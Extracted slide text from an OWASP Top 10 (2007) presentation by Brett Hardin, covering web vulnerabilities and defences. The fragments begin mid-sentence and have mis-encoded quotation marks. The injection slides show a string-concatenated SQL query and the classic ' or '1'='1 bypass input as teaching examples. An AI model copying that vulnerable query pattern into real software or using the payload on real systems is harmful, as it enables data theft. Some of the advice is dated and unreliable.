vulnerabilities ¤ Allows organizations to have insight into why their applications have vulnerabilities ¤ Aids in understanding the consequences ¤ Good starting point to implement a secure coding strategy ¤ Not a standard! OWASP Top 10 - Brett Hardin
attacks target the application and not infrastructure – Gartner ¤ Attack surface is huge [millions of lines of code] ¤ A single vulnerability can lead to catastrophic failure ¤ Network controls do nothing to stop application attacks OWASP Top 10 - Brett Hardin
constructed from the MITRE vulnerability trends for 2006 ¤ Only focused on vulnerabilities that affect web applications ¤ Exception is cryptographic vulnerabilities ¤ Represent root cause of many privacy leaks and compliance issues (PCI) ¤ Focus is on vulnerabilities not attacks OWASP Top 10 - Brett Hardin
a page that doesn`t have the correct access control policy in place. ¤ Having a page that is lhiddenz from the users. ¤ Pages that check privileges on the client but not on the server ¤ Attackers find these pages through forceful browsing. ¤ Susceptible Pages could follow out of date access control policies. OWASP Top 10 - Brett Hardin
¤ Exposes functionality to unauthorized users ¤ Loss of a record trail ¤ Can potentially bypass session management ¤ Prevents good auditing from taking place OWASP Top 10 - Brett Hardin
Careful planning ¤ Do not assume users will be unaware of hidden functionality ¤ Block access to all file types that your application doesn`t serve ¤ Create an access control matrix ¤ Should be created for every URL and business function OWASP Top 10 - Brett Hardin
sensitive transactions ¤ Not securing client-to-server connections ¤ Not securing server-to-database connections ¤ Not securing other back end connections that pass sensitive data. OWASP Top 10 - Brett Hardin
sensitive transactions ¤ Complete confidentiality loss ¤ Can`t trust the information being sent is lsecurez ¤ Complete integrity loss ¤ Can`t trust the information received is lsecurez OWASP Top 10 - Brett Hardin
sensitive information ¤ If it`s sensitive and stored it needs to be encrypted. ¤ Examples of sensitive items include: ¤ Credit cards ¤ passwords ¤ User data? OWASP Top 10 - Brett Hardin
your own cryptographic algorithms (homegrown) ¤ Don`t use weak algorithms (RC3,RC4, MD5, SHA-1) ¤ Generate and store private keys with care ¤ Ensure encrypted data stored is not easy to decrypt OWASP Top 10 - Brett Hardin
Failure to protect credentials ¤ User login from an unencrypted page ¤ Password reset enumeration ¤ Password/username sent in email ¤ Failure to protect session tokens ¤ Session tokens used in the URL ¤ Session tokens stored persistently in a cookie ¤ Session timeouts are too long OWASP Top 10 - Brett Hardin
Relies upon protection from Secure Communication (A9) and Cryptographic Storage (A8) ¤ DO NOT write your own session handlers! ¤ Applications should rely on robust well proven SSO or authentication systems ¤ DO NOT allow login from an unencrypted page ¤ Serve new session cookies after successful authentication ¤ Use timeouts for inactive sessions ¤ Verify the current password when using change password functionality OWASP Top 10 - Brett Hardin
¤ Unintentionally leaking information about configuration or internal workings ¤ Leaking internal state ¤ Revealing debug information to users ¤ Examples: ¤ Stack traces ¤ Failed SQL statements ¤ Path information ¤ Debug information OWASP Top 10 - Brett Hardin
Risk ¤ Fingerprinting servers ¤ Displaying errors can potentially lead to additional compromise ¤ SQL injection error messages can lead to Injection Flaws (A2) OWASP Top 10 - Brett Hardin
¤ Suppress errors from users (Log them instead) ¤ Create a custom error handler ¤ Use a standard exception handling architecture ¤ Aids in different HTTP error codes from being returned ¤ Potentially use random / unique error codes ¤ Development team should use a common approach ¤ Various layers (database) may also return exceptions ¤ Overriding error codes with 200 OK OWASP Top 10 - Brett Hardin
Forces the victim`s browser to send a request to another established application`s session. ¤ The code is often not on the site which suffers from the vulnerability ¤ Exploits the trust a site has with the browser. ¤ WIDESPREAD! (Sleeping Giant) OWASP Top 10 - Brett Hardin
Require authentication on GET/POST ¤ Use custom random tokens when making sensitive transactions ¤ Verify the submitted token is correct for the current user. ¤ Have adequate timeout`s for sessions ¤ In addition, check HTTP referrer header ¤ Check for crossdomain.xml files - flash OWASP Top 10 - Brett Hardin
a reference to an internal implementation object ¤ Database record ¤ Internal URL ¤ File ¤ Attacker modifies the direct object to access other objects OWASP Top 10 - Brett Hardin
indirect reference maps ¤ Direct maps can be easily guessed ¤ Avoid exposing private objects to users ¤ If a direct object must be used ¤ Ensure the user is authorized to view the object ¤ Validate private objects with an laccept known goodz approach OWASP Top 10 - Brett Hardin
to Data: $sql = lSELECT * FROM accounts WHERE account_number = l + $safe_request[laccount_numberz] + lAND user_id = l + $authenticated_data[luser_idz]; OWASP Top 10 - Brett Hardin
users to insert into server-based resources ¤ Strongly validate input using an laccept known goodz policy ¤ Add firewall rules to prevent applications from making new outbound connections ¤ Implement a sandbox to isolate applications from one another ¤ JVM security manager has been enabled OWASP Top 10 - Brett Hardin
data is sent to an interpreter as part of a command or query. ¤ Vulnerability that lbreaksz out of the intended context. ¤ Types of injection flaws: ¤ SQL injection ¤ XML injection ¤ LDAP injection ¤ XPATH injection OWASP Top 10 - Brett Hardin
allow an attacker to: ¤ create new db entries ¤ Read db entries ¤ Update db records ¤ delete any arbitrary data available to the application. OWASP Top 10 - Brett Hardin
* from users where username =bz + username + l`z; ¤ User inserts, Brett ¤ Db_query = lselect * from users where username =bBrett`z; OWASP Top 10 - Brett Hardin
* from users where username =bz + username + l`z; ¤ Attacker inserts X` or b1`=b1 ¤ Db_query = lselect * from users where username = bX` or b1`=b1`z); OWASP Top 10 - Brett Hardin
Separates SQL logic from supplied data ¤ Validate your input ¤ Use a laccept known goodz strategy. ¤ Then sanitize (Encode/Escape) your input ¤ Convert dangerous characters to their non-dangerous counterparts. (e.g. single quote (b) becomes %27) OWASP Top 10 - Brett Hardin
is a type of HTML injection. ¤ XSS allows a user to insert client side scripting into a page that will be displayed back to the user. ¤ XSS exploits the trust a user has with a site. ¤ Extremely common and simple for attackers to find OWASP Top 10 - Brett Hardin
XSS allows attacker to insert code into your application and present it to users on your behalf. ¤ Port-scan intranet ¤ Steal credentials ¤ Steal browser history ¤ Abuse browser vulnerabilities ¤ Log keystrokes ¤ Steal cookies ¤ lDefacez websites OWASP Top 10 - Brett Hardin
find all of the vulnerabilities in the OWASP Top 10. ¤ Developers should be fully versed in the OWASP Top 10 ¤ Prevents new code from being developed insecurely ¤ Have code reviews ¤ Hire a developer to specifically look at code from a security perspective OWASP Top 10 - Brett Hardin
application, you need to introduce the OWASP Top 10 to your developers. ¤ An ounce of prevention is worth a pound of cure. ¤ Benjamin Franklin OWASP Top 10 - Brett Hardin